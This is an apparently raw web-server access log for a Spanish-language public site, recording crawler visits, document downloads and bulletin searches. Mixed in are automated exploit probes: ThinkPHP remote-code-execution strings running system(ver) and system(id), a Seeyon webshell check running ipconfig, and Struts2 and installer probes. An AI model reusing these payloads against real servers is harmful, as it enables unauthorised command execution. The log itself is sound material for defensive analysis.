207.46.13.51 - - [21/Dec/2022:05:50:49 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
207.46.13.51 - - [21/Dec/2022:05:50:50 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/library/media/smartslider.min.css?1558968666 HTTP/1.1" 200 19594
207.46.13.51 - - [21/Dec/2022:05:50:50 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
207.46.13.51 - - [21/Dec/2022:05:50:51 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
207.46.13.51 - - [21/Dec/2022:05:50:51 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
207.46.13.51 - - [21/Dec/2022:05:50:52 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
172.22.2.4 - - [21/Dec/2022:05:49:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
207.46.13.122 - - [21/Dec/2022:05:50:56 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
157.55.39.46 - - [21/Dec/2022:05:51:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
157.55.39.212 - - [21/Dec/2022:05:51:05 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
157.55.39.212 - - [21/Dec/2022:05:51:06 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
157.55.39.212 - - [21/Dec/2022:05:51:06 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
213.180.203.72 - - [21/Dec/2022:05:51:28 -0500] "-" 408 -
66.249.64.13 - - [21/Dec/2022:05:52:38 -0500] "-" 408 -
201.245.192.253 - - [21/Dec/2022:05:52:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:05:53:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:05:54:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:05:56:00 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [21/Dec/2022:05:56:00 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [21/Dec/2022:05:54:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [21/Dec/2022:05:56:32 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=4596&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 1113
172.22.2.4 - - [21/Dec/2022:05:56:32 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [21/Dec/2022:05:55:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
190.24.97.109 - - [21/Dec/2022:05:56:36 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
190.24.97.109 - - [21/Dec/2022:05:56:40 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 327144
172.22.2.4 - - [21/Dec/2022:05:55:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50149
201.245.192.253 - - [21/Dec/2022:05:57:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:05:58:40 -0500] "HEAD / HTTP/1.1" 200 -
173.252.127.23 - - [21/Dec/2022:05:59:43 -0500] "GET /images/Entrenubes%201%20(1)%20(1).jpeg HTTP/1.1" 200 70096
173.252.95.14 - - [21/Dec/2022:06:00:00 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
66.249.64.13 - - [21/Dec/2022:06:00:42 -0500] "-" 408 -
5.45.207.139 - - [21/Dec/2022:06:01:28 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:06:00:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:06:00:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52079
201.245.192.253 - - [21/Dec/2022:06:02:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
157.55.39.152 - - [21/Dec/2022:06:03:04 -0500] "GET /galeria/galeria/fotos/Humedal-Santa-Mar%C3%ADa-del-Lago3P.jpg HTTP/1.1" 200 30161
216.245.221.92 - - [21/Dec/2022:06:03:40 -0500] "HEAD / HTTP/1.1" 200 -
94.236.193.137 - - [21/Dec/2022:06:04:16 -0500] "GET / HTTP/1.1" 200 319
13.37.104.99 - - [21/Dec/2022:06:06:31 -0500] "GET / HTTP/1.1" 200 319
40.77.188.42 - - [21/Dec/2022:06:06:37 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
40.77.188.42 - - [21/Dec/2022:06:06:42 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-pa%CC%81gina-de-nin%CC%83os9.jpg HTTP/1.1" 200 14600
172.22.2.4 - - [21/Dec/2022:06:05:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Dec/2022:06:07:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.22.2.4 - - [21/Dec/2022:06:08:17 -0500] "POST /BLA/boletinlegal/cobbler_api HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:06:06:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
66.249.64.13 - - [21/Dec/2022:06:08:37 -0500] "-" 408 -
96.126.105.142 - - [21/Dec/2022:04:28:39 -0500] "POST /hybridity/api/sessions HTTP/1.1" 406 -
216.245.221.92 - - [21/Dec/2022:06:08:40 -0500] "HEAD / HTTP/1.1" 200 -
96.126.105.142 - - [21/Dec/2022:04:28:40 -0500] "POST /api/login HTTP/1.1" 400 962
96.126.105.142 - - [21/Dec/2022:06:08:41 -0500] "-" 408 -
207.46.13.194 - - [21/Dec/2022:06:10:07 -0500] "GET /bla/resoluciones/notificaciones/autos%202020/1762.pdf HTTP/1.1" 304 -
172.22.2.4 - - [21/Dec/2022:06:10:20 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [21/Dec/2022:06:10:21 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7450
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [21/Dec/2022:06:10:25 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1334
172.22.2.4 - - [21/Dec/2022:06:10:35 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=888&solicitante=&radicado_entrada=&fecha_concepto=2018&objeto= HTTP/1.1" 200 570
172.22.2.4 - - [21/Dec/2022:06:10:38 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=888&solicitante=&radicado_entrada=&fecha_concepto=2018&objeto= HTTP/1.1" 200 570
114.119.148.37 - - [21/Dec/2022:06:10:37 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Tierra-escenario.jpg HTTP/1.1" 200 181491
172.22.2.4 - - [21/Dec/2022:06:10:45 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=&solicitante=&radicado_entrada=&fecha_concepto=2018&objeto=plan%20de%20contingencia HTTP/1.1" 200 570
172.22.2.4 - - [21/Dec/2022:06:10:46 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=&solicitante=&radicado_entrada=&fecha_concepto=2018&objeto=plan%20de%20contingencia HTTP/1.1" 200 570
172.22.2.4 - - [21/Dec/2022:06:10:47 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=&solicitante=&radicado_entrada=&fecha_concepto=2018&objeto=plan%20de%20contingencia HTTP/1.1" 200 570
172.22.2.4 - - [21/Dec/2022:06:10:56 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=&solicitante=&radicado_entrada=&fecha_concepto=2018&objeto=plan%20de%20contingencia HTTP/1.1" 200 570
172.22.2.4 - - [21/Dec/2022:06:10:57 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=&solicitante=&radicado_entrada=&fecha_concepto=2018&objeto=plan%20de%20contingencia HTTP/1.1" 200 570
172.22.2.4 - - [21/Dec/2022:06:11:11 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=&solicitante=&radicado_entrada=&fecha_concepto=2018&objeto=plan%20de%20contingencia HTTP/1.1" 200 570
172.22.2.4 - - [21/Dec/2022:06:11:11 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=&solicitante=&radicado_entrada=&fecha_concepto=2018&objeto=plan%20de%20contingencia HTTP/1.1" 200 570
172.22.2.4 - - [21/Dec/2022:06:11:11 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=&solicitante=&radicado_entrada=&fecha_concepto=2018&objeto=plan%20de%20contingencia HTTP/1.1" 200 570
172.22.2.4 - - [21/Dec/2022:06:11:18 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=&solicitante=&radicado_entrada=&fecha_concepto=2018&objeto=contingencia HTTP/1.1" 200 1087
172.22.2.4 - - [21/Dec/2022:06:11:18 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [21/Dec/2022:06:10:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
95.108.213.26 - - [21/Dec/2022:06:11:28 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:06:11:31 -0500] "GET /BLA/boletinlegal/conceptos/2018/88.pdf HTTP/1.1" 200 399666
172.104.27.41 - - [21/Dec/2022:06:11:31 -0500] "-" 408 -
172.104.27.41 - - [21/Dec/2022:06:11:32 -0500] "-" 408 -
201.245.192.253 - - [21/Dec/2022:06:12:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.22.2.4 - - [21/Dec/2022:06:11:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [21/Dec/2022:06:13:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:06:12:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46153
181.53.13.169 - - [21/Dec/2022:06:14:39 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.53.13.169 - - [21/Dec/2022:06:14:39 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.53.13.169 - - [21/Dec/2022:06:14:39 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.53.13.169 - - [21/Dec/2022:06:14:40 -0500] "GET /galeria/bibloteca/contentflow.js HTTP/1.1" 200 42804
181.53.13.169 - - [21/Dec/2022:06:14:42 -0500] "GET /galeria/bibloteca/mycontentflow.css HTTP/1.1" 200 3110
181.53.13.169 - - [21/Dec/2022:06:14:42 -0500] "GET /galeria/bibloteca/contentflow.css HTTP/1.1" 200 3201
181.53.13.169 - - [21/Dec/2022:06:14:42 -0500] "GET /galeria/bibloteca/ContentFlowAddOn_white.js HTTP/1.1" 200 2497
181.53.13.169 - - [21/Dec/2022:06:14:42 -0500] "GET /galeria/bibloteca/ContentFlowAddOn_white.css HTTP/1.1" 200 3355
181.53.13.169 - - [21/Dec/2022:06:14:42 -0500] "GET /galeria/bibloteca/img/loader.gif HTTP/1.1" 200 8238
181.53.13.169 - - [21/Dec/2022:06:14:42 -0500] "GET /galeria/bibloteca/img/scrollbar_white.png HTTP/1.1" 200 82
181.53.13.169 - - [21/Dec/2022:06:14:42 -0500] "GET /galeria/bibloteca/img/slider_white.png HTTP/1.1" 200 178
181.53.13.169 - - [21/Dec/2022:06:14:45 -0500] "GET /galeria/bibloteca/img/1x1_0.5_white.png HTTP/1.1" 200 82
181.53.13.169 - - [21/Dec/2022:06:14:45 -0500] "GET /galeria/bibloteca/img/scrollbar_black.png HTTP/1.1" 200 82
181.53.13.169 - - [21/Dec/2022:06:14:45 -0500] "GET /galeria/bibloteca/img/ajax-loader.gif HTTP/1.1" 200 9427
181.53.13.169 - - [21/Dec/2022:06:14:45 -0500] "GET /galeria/bibloteca/img/slider_black.png HTTP/1.1" 200 175
5.45.207.150 - - [21/Dec/2022:06:15:12 -0500] "-" 408 -
87.250.224.27 - - [21/Dec/2022:06:15:17 -0500] "-" 408 -
87.250.224.168 - - [21/Dec/2022:06:15:23 -0500] "-" 408 -
87.250.224.142 - - [21/Dec/2022:06:15:28 -0500] "-" 408 -
20.7.159.167 - - [21/Dec/2022:06:15:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/0288.pdf HTTP/1.1" 200 418763
20.7.159.167 - - [21/Dec/2022:06:15:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1466.pdf HTTP/1.1" 200 339441
40.94.33.38 - - [21/Dec/2022:06:15:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/0288.pdf HTTP/1.1" 200 418763
40.94.33.55 - - [21/Dec/2022:06:15:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1466.pdf HTTP/1.1" 200 339441
87.250.224.26 - - [21/Dec/2022:06:15:43 -0500] "-" 408 -
66.249.64.13 - - [21/Dec/2022:06:15:44 -0500] "-" 408 -
213.180.203.5 - - [21/Dec/2022:06:15:58 -0500] "-" 408 -
5.45.207.117 - - [21/Dec/2022:06:16:28 -0500] "-" 408 -
95.108.213.52 - - [21/Dec/2022:06:17:28 -0500] "-" 408 -
201.244.197.70 - - [21/Dec/2022:06:17:29 -0500] "GET /BLA/resoluciones/AUTOS%202019/2693.pdf HTTP/1.1" 200 264466
201.245.192.253 - - [21/Dec/2022:06:17:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.22.2.4 - - [21/Dec/2022:06:18:06 -0500] "GET /BLA/boletinlegal/pfblockerng/www/index.php HTTP/1.1" 404 1038
87.250.224.147 - - [21/Dec/2022:06:18:28 -0500] "-" 408 -
216.245.221.92 - - [21/Dec/2022:06:18:40 -0500] "HEAD / HTTP/1.1" 200 -
23.92.21.31 - - [21/Dec/2022:06:18:44 -0500] "-" 408 -
23.92.21.31 - - [21/Dec/2022:04:38:46 -0500] "POST /ui/login.action HTTP/1.1" 400 976
172.22.2.4 - - [21/Dec/2022:06:17:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:06:18:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51248
5.255.253.103 - - [21/Dec/2022:06:20:28 -0500] "-" 408 -
201.245.192.253 - - [21/Dec/2022:06:20:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42464
201.245.192.253 - - [21/Dec/2022:06:20:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40615
172.22.2.4 - - [21/Dec/2022:06:22:01 -0500] "POST /BLA/boletinlegal/system/sharedir.php HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:06:22:02 -0500] "POST /BLA/boletinlegal/install/install.php?step=4 HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:06:22:05 -0500] "POST /BLA/boletinlegal/en/php/usb_sync.php HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:06:22:06 -0500] "GET /BLA/boletinlegal/install/includes/configure.php HTTP/1.1" 404 1038
172.104.27.41 - - [21/Dec/2022:06:22:07 -0500] "-" 408 -
172.104.27.41 - - [21/Dec/2022:06:22:08 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:06:22:36 -0500] "POST /BLA/boletinlegal/seeyon/htmlofficeservlet HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:06:22:40 -0500] "GET /BLA/boletinlegal/seeyon/test123456.jsp?pwd=asasd3344&2JDZJq341QZ4MVu792HPULKDkia=ipconfig HTTP/1.1" 404 1038
201.245.192.253 - - [21/Dec/2022:06:22:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
87.250.224.186 - - [21/Dec/2022:06:23:28 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:06:22:36 -0500] "GET /BLA/boletinlegal/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) HTTP/1.1" 200 32715
216.245.221.92 - - [21/Dec/2022:06:23:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:06:22:48 -0500] "GET /BLA/boletinlegal/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) HTTP/1.1" 200 24523
207.46.13.174 - - [21/Dec/2022:06:23:47 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 167184
172.22.2.4 - - [21/Dec/2022:06:23:50 -0500] "POST /BLA/boletinlegal/struts2-rest-showcase/orders/3 HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:06:23:54 -0500] "POST /BLA/boletinlegal/orders/3 HTTP/1.1" 404 1038
207.46.13.198 - - [21/Dec/2022:06:24:09 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
172.22.2.4 - - [21/Dec/2022:06:23:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:06:24:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49550
201.245.192.253 - - [21/Dec/2022:06:27:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
207.46.13.174 - - [21/Dec/2022:06:28:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%202900-2915.tif HTTP/1.1" 200 1525102
5.45.207.143 - - [21/Dec/2022:06:28:28 -0500] "-" 408 -
216.245.221.92 - - [21/Dec/2022:06:28:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:06:28:38 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 36811
201.245.192.253 - - [21/Dec/2022:06:30:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42464
201.245.192.253 - - [21/Dec/2022:06:30:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40615
172.22.2.4 - - [21/Dec/2022:06:29:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:06:30:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.218.206.120 - - [21/Dec/2022:06:32:44 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [21/Dec/2022:06:32:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:06:33:40 -0500] "HEAD / HTTP/1.1" 200 -
186.102.63.238 - - [21/Dec/2022:06:36:17 -0500] "-" 408 -
87.250.224.20 - - [21/Dec/2022:06:36:28 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:06:35:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:06:35:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47659
201.245.192.253 - - [21/Dec/2022:06:37:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:06:38:40 -0500] "HEAD / HTTP/1.1" 200 -
186.102.17.240 - - [21/Dec/2022:06:38:52 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+7zyE7/0vZL2qufs7VVz0bSx966SHFULhPpqX0KXTc5XD6aI1b+U1p&y=U2FsdGVkX19e6amjN0hnT8KoIwknWe1sr6DGP5IosSVohLCwP2LI1sN0I+8VmL8K HTTP/1.1" 200 30
186.102.17.240 - - [21/Dec/2022:06:38:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX188MeYDZ0HxW2VHvhZqVPtkgmOKm4TuyeorLFLTGQ5NcMWMPkq8g6NEheCH4PuI7XQ8MiDm7ywMahSyT9qu470P2wJhYuZSr+0=&u=U2FsdGVkX1/02wdaFYojjccO14c2ucMQEwnC++gY0L8=&y=U2FsdGVkX19e6amjN0hnT8KoIwknWe1sr6DGP5IosSVohLCwP2LI1sN0I+8VmL8K HTTP/1.1" 200 97
186.102.17.240 - - [21/Dec/2022:06:38:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1++BU1IwAwPlkF54upZqDy/PC0b4YmLDEuZIZ/Jm4It4bK8iTkIynV2eJfEC6sm6tCgnLPQ+1+muA+TXS5UhehUenj5lUJiXkygLJL5nSl64TaQkwLuDKI5xsw4NKZABbYRaB20AsVj0DqAhNXKrwO6YjFOY4Eb98xRa4AtNMEvN/rUI2Q2tbU0wfZ83ZRVUVq2G4oanQP8RhuYl3K0Bso3EEZiaH3H+AzpeNHG87r4yaXspkGN4gH9u2/Tw9LDlrRVyuuBDgBRcXBfS/KKlorBdLcEamK313IfNrVTbMJVGNPB6z0OLV81VbVqxH8PwYwfnHDfagV+7Q4oxQe9Xaw3kDd+coWkF0+mx/Q4YmFnRkvI0mX6+R6ddnCR+OqI3CDx6CR0zslO5avnSJpehYS8YjHb43o8FAGaQQBeidEYx1sZKXyQyCRKDkMh+nUCZBsbzpv+VMBffFvCgGpQZqcwI2GvUZAJ4QnR2ETlZ9GozOxLBFBWjmTzFMWzGwjQBg1h1sabKltR49ms6D1W8BMoj5O1ykzTDEbw4tDGv6w9butLEBeA4IzLUj/USoHVRMMv8ktPmbsA/gJC/jLfIRFIkJsi9mjvRuO3bXW5PV2whJxB4UxKu5KvkQpXqOG3aC7HZXuma9/QwgAbYWmZP1rfuZBM7hNwMvxP/ROzsL4T3hGFzXAF4nZBg53mUpdQs6pyYcPUJ6+/jqx4b+wqq2FLb31NUjdJaKqLIjJIK3RpEgf5um8EtxfdZrMg0ILuI5zv1Oml5/46eNr02ciqFyQqPo3zNFa0px5FQwb9J5dugRpvKSHaTXInzWsHkzVD/ZIoQO3Mw9e5rvuLvrTO1mud3K/tgiXBHAuAXkePto9TBS2Q+PJ/FjZtjsyhHzfbBT1gF49p0V9oPE4wWfU44azDthDhq8H+Wg1mw/KZXBg99zaQM9iG/ikRG0hpbQSMvP30vaxFwxNMfhPPYnF2VhuHUT5eNF5ZHqeHpKYhMmxfh7dDlJGfaXvqk+ihR5LF6Rrh5rF0QL3W3nN8/GukGEpgsDntCHSg9EitispHxymTsDFEZ3XfkvacM7HD4UzEm6QHBXZwY01F3JuPSw9OoHEkpt67PjibKyw+ogizC59y+LLAz5Utspi4oifg77Dlf0Jxek7obwlbPEVZD32HmrbLG0Vpo2zh8VW07IHi/NcJrJEm0UVq99E+w0InQtZcXGfTZQ5FYRcLWzSxMzre8xkNzh2pVEq07xIJdTA7BnNNda/NGqgA60WM5/2Y5EkMnM4MKlclst6NUurFmfy1iSJJepkXMo/F2WmVnmwSZezTUOZd/4EUd7Vw+tcKo5TXpUJn5ufSITYEeLRyVmvnl1cD7/54yhq5fTFsNGtYhNIZArofARwhTyJTyzYpeCl99a3GIveP1/8Sy103fZ7PX4FNj2OPHzsHOtU=&u=U2FsdGVkX1/02wdaFYojjccO14c2ucMQEwnC++gY0L8=&y=U2FsdGVkX19e6amjN0hnT8KoIwknWe1sr6DGP5IosSVohLCwP2LI1sN0I+8VmL8K HTTP/1.1" 200 906
186.102.17.240 - - [21/Dec/2022:06:38:53 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/sMH/ZFnE4GvWlDQcg28p/0M/C1C1H3cNSDUjk3+eVaIcj5AWFdnlMICR9I/P5luG/CHOkge5rG8ngRWbC8sD9cfQPQYPW+dmQX6uQO+0wqu1p3JZQbO1wZye/yrCy5YXeLJTABL8QthFPmjfPyxgFDkdF7JY+8mpos8Vap6//W6m5kkv4GAaZTq8PNUod5d65gYxhN0QgmX7B0X+U41URj06Ef37fX4qOM5tZRmuFGej9nefvvsB4xHhiw9gCGcgW++YBzfgGPXxQi/hZde9z4xpwwe3MrjSSzp87qInkKbiNfcb6YdZwftJL9Rg/N2en5r25scYVwS/4EheS7Q3bB96JLQ8NWP8=&u=U2FsdGVkX1/02wdaFYojjccO14c2ucMQEwnC++gY0L8=&y=U2FsdGVkX19e6amjN0hnT8KoIwknWe1sr6DGP5IosSVohLCwP2LI1sN0I+8VmL8K HTTP/1.1" 200 196
